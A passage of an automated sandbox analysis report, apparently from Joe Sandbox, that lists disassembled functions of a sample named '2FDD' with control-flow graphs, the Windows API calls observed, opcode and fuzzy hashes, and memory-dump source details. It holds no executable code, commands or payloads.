                                                                                                                                                                                                                                  • Opcode ID: b66d3236efea58544a79c388fdff550fe6fba370de15f14bfee59ef4b5573146
                                                                                                                                                                                                                                  • Instruction ID: 2fdd8d1851c4ad02e4dbc48665a4f3ebc56f6be7584726cefee839b57352e6b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b66d3236efea58544a79c388fdff550fe6fba370de15f14bfee59ef4b5573146
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 095159B4D003498FDB14DFAAD54879EBBF2EF48304F248459E419A73A0DB74A944CB66
                                                                                                                                                                                                                                  Function 06B6BD40 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 646 6b6bd40-6b6bd6e 648 6b6bdb7-6b6bdb9 646->648 649 6b6bd70-6b6bdb0 646->649 662 6b6bdbb call 6b6be18 648->662 663 6b6bdbb call 6b6be08 648->663 649->648 651 6b6bdc1-6b6bdc3 652 6b6bdc5-6b6bdf7 call 6b6ade4 651->652 653 6b6bdff-6b6be04 651->653 652->653 662->651 663->651
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: W$SXll^
                                                                                                                                                                                                                                  • API String ID: 0-949671565
                                                                                                                                                                                                                                  • Opcode ID: 9f2b0e24119bb7b7ad28cde8a7f985847d0d92a8af5a6010c202fc1890d8b8ca
                                                                                                                                                                                                                                  • Instruction ID: a1df06151a8eaab49b5a4973a58dd0263cca4858ac54bd65f928c1a1e9f8f8b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f2b0e24119bb7b7ad28cde8a7f985847d0d92a8af5a6010c202fc1890d8b8ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A11BEB03053118FEB5AEF39D45069A77E2FF8621472089ADE15ADB381DF319906CB91
                                                                                                                                                                                                                                  Function 00D0AE30 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 664 d0ae30-d0ae3f 665 d0ae41-d0ae4e call d09838 664->665 666 d0ae6b-d0ae6f 664->666 673 d0ae50 665->673 674 d0ae64 665->674 667 d0ae71-d0ae7b 666->667 668 d0ae83-d0aec4 666->668 667->668 675 d0aed1-d0aedf 668->675 676 d0aec6-d0aece 668->676 721 d0ae56 call d0b0c8 673->721 722 d0ae56 call d0b0b8 673->722 674->666 678 d0aee1-d0aee6 675->678 679 d0af03-d0af05 675->679 676->675 677 d0ae5c-d0ae5e 677->674 680 d0afa0-d0afb7 677->680 682 d0aef1 678->682 683 d0aee8-d0aeef call d0a814 678->683 681 d0af08-d0af0f 679->681 697 d0afb9-d0b018 680->697 685 d0af11-d0af19 681->685 686 d0af1c-d0af23 681->686 684 d0aef3-d0af01 682->684 683->684 684->681 685->686 688 d0af30-d0af39 call d0a824 686->688 689 d0af25-d0af2d 686->689 695 d0af46-d0af4b 688->695 696 d0af3b-d0af43 688->696 689->688 698 d0af69-d0af76 695->698 699 d0af4d-d0af54 695->699 696->695 715 d0b01a-d0b060 697->715 705 d0af78-d0af96 698->705 706 d0af99-d0af9f 698->706 699->698 700 d0af56-d0af66 call d0a834 call d0a844 699->700 700->698 705->706 716 d0b062-d0b065 715->716 717 d0b068-d0b093 GetModuleHandleW 715->717 716->717 718 d0b095-d0b09b 717->718 719 d0b09c-d0b0b0 717->719 718->719 721->677 722->677
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B086
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                  • Opcode ID: 4310b896dd805d0ea3449701627cae0b899874c6786c2f222d314e14997bb9b4
                                                                                                                                                                                                                                  • Instruction ID: e62f367316542c383b68841fd53a28bf983e8c3f114c831226fab0187629845a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4310b896dd805d0ea3449701627cae0b899874c6786c2f222d314e14997bb9b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E7137B0A00B058FD724DF29D05575ABBF1FF88304F04892DE49AD7A80D775E949CBA1
                                                                                                                                                                                                                                  Function 00D05935 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 723 d05935-d0593b 724 d05944-d05a01 CreateActCtxA 723->724 726 d05a03-d05a09 724->726 727 d05a0a-d05a64 724->727 726->727 734 d05a73-d05a77 727->734 735 d05a66-d05a69 727->735 736 d05a88 734->736 737 d05a79-d05a85 734->737 735->734 738 d05a89 736->738 737->736 738->738
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00D059F1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 43e60d195bf16f5224dc19631b34b2bd36e4fa7a386b0c376a45b739e452d92c
                                                                                                                                                                                                                                  • Instruction ID: 3f8b4eef02cb1ac452c0e006001d41a76be7b1466a3cd9958281c84111d218da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43e60d195bf16f5224dc19631b34b2bd36e4fa7a386b0c376a45b739e452d92c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8541E070D00719CBEB24CFA9C884B9EBBB5FF48308F24855AD419AB254DBB56986CF50
                                                                                                                                                                                                                                  Function 00D04248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 740 d04248-d05a01 CreateActCtxA 743 d05a03-d05a09 740->743 744 d05a0a-d05a64 740->744 743->744 751 d05a73-d05a77 744->751 752 d05a66-d05a69 744->752 753 d05a88 751->753 754 d05a79-d05a85 751->754 752->751 755 d05a89 753->755 754->753 755->755
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00D059F1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 7ad2f8601bd954a87729a91a5fdd79ed0d19afd83a0c15ffe66b740a1f0a0724
                                                                                                                                                                                                                                  • Instruction ID: eae7ddc29b23df4b1ac1e98584b2d91bc004eda4f114c9f0ec7a4528fc2ec8bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad2f8601bd954a87729a91a5fdd79ed0d19afd83a0c15ffe66b740a1f0a0724
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC41D3B0D00719CFEB24CFA9D844B9EBBB5FF44304F24816AD408AB255D7B56945CF90
                                                                                                                                                                                                                                  Function 00D0D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 757 d0d300-d0d394 DuplicateHandle 758 d0d396-d0d39c 757->758 759 d0d39d-d0d3ba 757->759 758->759
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D387
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                  • Opcode ID: 49c537a7e814c7bd38175510646bdd632095fc5ddcaa8453955479e8c5476d0e
                                                                                                                                                                                                                                  • Instruction ID: 2ad2cc9942e8b395c021e60c253bb98ba45841baf9fae9a1c73320245a243300
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49c537a7e814c7bd38175510646bdd632095fc5ddcaa8453955479e8c5476d0e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6121B0B59003499FDB10CFAAD984BEEBBF9EB48310F14841AE918A7350D374A954CFA5
                                                                                                                                                                                                                                  Function 06997910 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 762 6997910-6997f00 764 6997f08-6997f33 LoadLibraryW 762->764 765 6997f02-6997f05 762->765 766 6997f3c-6997f59 764->766 767 6997f35-6997f3b 764->767 765->764 767->766
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06997E1E), ref: 06997F26
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1581963115.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6990000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                  • Opcode ID: b19de0b4621612bf03d2ac73aad2c16f52f6d278727a748d48922a2167eb1aca
                                                                                                                                                                                                                                  • Instruction ID: a71e67ec2fc7405f862deb27f0431c7793958cd4addea458fb53f540e9fc1e2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b19de0b4621612bf03d2ac73aad2c16f52f6d278727a748d48922a2167eb1aca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C1123B6D103098FDB20DF9AC844BDEFBF5EB88214F14842AD819BB610C775A945CFA5
                                                                                                                                                                                                                                  Function 06997EBF Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 770 6997ebf-6997f00 772 6997f08-6997f33 LoadLibraryW 770->772 773 6997f02-6997f05 770->773 774 6997f3c-6997f59 772->774 775 6997f35-6997f3b 772->775 773->772 775->774
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06997E1E), ref: 06997F26
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1581963115.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6990000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                  • Opcode ID: 168a8462930f10bcdb41127a3d208c3920c2e8c663fd1ba5f8b0b92691a3dc48
                                                                                                                                                                                                                                  • Instruction ID: 5d4dbb0c5baba950db68d598e5efeb7cb9a2cb341bcc343f3746a42ef4d71dfc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 168a8462930f10bcdb41127a3d208c3920c2e8c663fd1ba5f8b0b92691a3dc48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B1134B6D003098FCB20CF9AD844BDEFBF8AF88214F14841AD419B7610C774A545CFA5
                                                                                                                                                                                                                                  Function 085B0970 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 778 85b0970-85b09e2 PostMessageW 780 85b09eb-85b09ff 778->780 781 85b09e4-85b09ea 778->781 781->780
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 085B09D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1584449141.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_85b0000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  • Opcode ID: fa512fbfe558ef75935a18cfb4201162e96a606744846942c8998bd0c9cdfdff
                                                                                                                                                                                                                                  • Instruction ID: 8b5d5e681b3ddaa04aea37974d07423c72a9df9c3a3e26d5d9aed7e2fc6f4899
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa512fbfe558ef75935a18cfb4201162e96a606744846942c8998bd0c9cdfdff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF11F5B59003499FDB10CF9AD845BDFBBF8EB48314F108419E954A7240C375A944CFA5
                                                                                                                                                                                                                                  Function 00D0B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 783 d0b020-d0b060 784 d0b062-d0b065 783->784 785 d0b068-d0b093 GetModuleHandleW 783->785 784->785 786 d0b095-d0b09b 785->786 787 d0b09c-d0b0b0 785->787 786->787
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B086
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                  • Opcode ID: 6e6fb44a5ceacd6bb730dfa2bf3697fafd7851210bb9a97f213deaac2f36dc4e
                                                                                                                                                                                                                                  • Instruction ID: efda523d4a0312627bbf4f29572f367bcff779631465232b276a58ec3c2411de
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e6fb44a5ceacd6bb730dfa2bf3697fafd7851210bb9a97f213deaac2f36dc4e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D110FB6C003498FDB20CF9AC444BDEFBF4EB89320F14842AD868A7250C375A545CFA1
                                                                                                                                                                                                                                  Function 085B0978 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 789 85b0978-85b09e2 PostMessageW 790 85b09eb-85b09ff 789->790 791 85b09e4-85b09ea 789->791 791->790
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 085B09D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1584449141.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_85b0000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  • Opcode ID: e4ad87b7c5e3d7f6b7bbc951ec8922af5b541972c49c5719f97b68abdffcd8fa
                                                                                                                                                                                                                                  • Instruction ID: 95ca34bd1e8c94ad0acb098a9f240af5d4c13a4de37cf40eead216e7f4b83f23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4ad87b7c5e3d7f6b7bbc951ec8922af5b541972c49c5719f97b68abdffcd8fa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D11C2B58003499FDB10DF9AD885BDFBBF8EB48314F10841AD558A7250C375A944CFA5
                                                                                                                                                                                                                                  Function 06B6BD50 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: SXll^
                                                                                                                                                                                                                                  • API String ID: 0-988229388
                                                                                                                                                                                                                                  • Opcode ID: 28c2554b3618bcbbed0a369e0bc9cf566a1a0a6bd1d24cd4e6db29211e197132
                                                                                                                                                                                                                                  • Instruction ID: 2e7ba54e90d47cc012ec58fafc7d483a9e7857e62bbc0d7c08bb5edd4c92b1a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28c2554b3618bcbbed0a369e0bc9cf566a1a0a6bd1d24cd4e6db29211e197132
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A118CB12013118FDB69EF2AD44065A77E6FB85714720897DE11A9B380DF72A905CB91
                                                                                                                                                                                                                                  Function 06B657A8 Relevance: 1.0, Instructions: 965COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8e459ef3659a7e4d932ec889156093d92599274a1fc0c8369246ec09cafae60a
                                                                                                                                                                                                                                  • Instruction ID: 9064420006b14c7234bcf1b066306bb9cddf97940a0087909faa5f98f55402c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e459ef3659a7e4d932ec889156093d92599274a1fc0c8369246ec09cafae60a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF825875B002049FDB24EF39D454A6E7BF2EF88315B1445A9EA06DB3A4EB35EC41CB90
                                                                                                                                                                                                                                  Function 06B61ED0 Relevance: .4, Instructions: 416COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 206f6970307a1e2fc4d3efb6c120bf6692cde130980baeef3996ac355d918f1e
                                                                                                                                                                                                                                  • Instruction ID: 822ea8a0ef0e8c551f0cac1a8e627738183ded30ca49ac2aa40eeb8d2be6f285
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 206f6970307a1e2fc4d3efb6c120bf6692cde130980baeef3996ac355d918f1e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3025C71A002099FDB05DFA9C894AAEBBF6FF89300F148095F955AB365CB34DD41CBA0
                                                                                                                                                                                                                                  Function 06B63390 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c3873f827f9eb9a3d17cbdc64a860bd46b72ab93a55ac4d42a976f5deda951c4
                                                                                                                                                                                                                                  • Instruction ID: aed184e7ff3c5e018397b2c1abd44ab0133c90709c43d769c96af2469eebb13b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3873f827f9eb9a3d17cbdc64a860bd46b72ab93a55ac4d42a976f5deda951c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95B10F75B105149FCB08EF68E89896E7BF6EF8961171541AAF602DB371DB31EC01CBA0
                                                                                                                                                                                                                                  Function 06B6C6F4 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 790977ad51252259c3e1ace1b376103aacf00726346bb9b944102fab1d50e6bf
                                                                                                                                                                                                                                  • Instruction ID: 722abb10d0e9f90c30f30c61c1f504fdf58808f6458333bbce0bdbf0489ad4b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 790977ad51252259c3e1ace1b376103aacf00726346bb9b944102fab1d50e6bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A1ACB4E047089FDB14DFA9C84479EBBF1FF89300F14869AE405AB291DB74A946CB90
                                                                                                                                                                                                                                  Function 06B630C0 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b81aab19862679cda70266524afcd4c8488e3b6a949e6220cc84d4f9c998ebcc
                                                                                                                                                                                                                                  • Instruction ID: e0f3dd8ef09a88826078fd9131b49f8d72ec0d0d98ca39667d467e14382a529a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b81aab19862679cda70266524afcd4c8488e3b6a949e6220cc84d4f9c998ebcc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8710470F043405FEB55AB79946832E3BF3AFC9240B1858AAE542EB396DE78DC068751
                                                                                                                                                                                                                                  Function 06B66B00 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 823a4d9428fdc0f8045a723f4cd2625cc0a21b4ea92ca3e0dd463054983ea7a9
                                                                                                                                                                                                                                  • Instruction ID: 95e489ea970d0721045e96e3d2aa12756e6b7d788b47c0d1d074e3d9782d1d0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 823a4d9428fdc0f8045a723f4cd2625cc0a21b4ea92ca3e0dd463054983ea7a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7818C71B002149FCB44DF69D89499DBBF5FF89350B1980AAE806EB361EB34EC41CB91
                                                                                                                                                                                                                                  Function 06B659C6 Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1583642060.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6b60000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e99b37474ed5231214cf5cdcaba2f9170bf442eb6b93dc3a894662a07398b3a
                                                                                                                                                                                                                                  • Instruction ID: 086f3164f00c5725d4ccb0d929f2b55e6417d333c05237c70edd6f3e893c7f0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e99b37474ed5231214cf5cdcaba2f9170bf442eb6b93dc3a894662a07398b3a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9571AE75B102419FDB65AF38D458B2D3BF2AFC9211B1904A9E942DB3A0DF34DC12CB91
                                                                                                                                                                                                                                  Function 06B6338A Relevance: .2, Instructions: 159COMMON
